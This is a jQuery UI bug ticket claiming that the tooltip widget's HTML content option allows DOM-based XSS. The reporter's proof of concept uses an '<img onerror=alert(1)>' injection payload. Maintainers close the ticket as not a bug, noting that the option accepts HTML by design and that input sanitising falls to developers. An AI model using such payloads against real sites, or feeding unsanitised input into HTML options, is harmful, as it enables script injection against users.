Search and Top Navigation
#15199 closed bug (notabug)
Opened June 06, 2017 01:12PM UTC
Closed June 06, 2017 01:21PM UTC
Last modified June 06, 2017 01:49PM UTC
input widget, content argument DOM based XSS
| Reported by: | psych0tr1a | Owned by: | |
|---|---|---|---|
| Priority: | minor | Milestone: | none |
| Component: | ui.tooltip | Version: | 1.12.1 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
Proof of concept:
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.0/themes/smoothness/jquery-ui.css">
<script src="//code.jquery.com/jquery-1.12.4.js"></script>
<script src="//code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
<input title="Input help">
<script>
$( document ).tooltip({
content: "<img src=s onerror=alert(1)>"
});
</script>
Attachments (0)
Change History (4)
Changed June 06, 2017 01:21PM UTC by comment:1
| component: | ui.widget → ui.tooltip |
|---|---|
| resolution: | → notabug |
| status: | new → closed |
Changed June 06, 2017 01:29PM UTC by comment:2
Sorry but you are absolutely wrong. Functionality means that there will be inserted text ane html, if the developers will use this functionality and there will be a user input then this is XSS.
Example of similar bug http://www.cvedetails.com/cve/CVE-2010-5312/
Changed June 06, 2017 01:32PM UTC by comment:3
another fixed bug
https://domstorm.skepticfx.com/modules?id=5739c438c9e0250300990935
Changed June 06, 2017 01:49PM UTC by comment:4
Those are both text options. This is an HTML option. If you allow user input, then it's your responsibility to clean it.
That's not XSS. That's you explicitly inserting a script.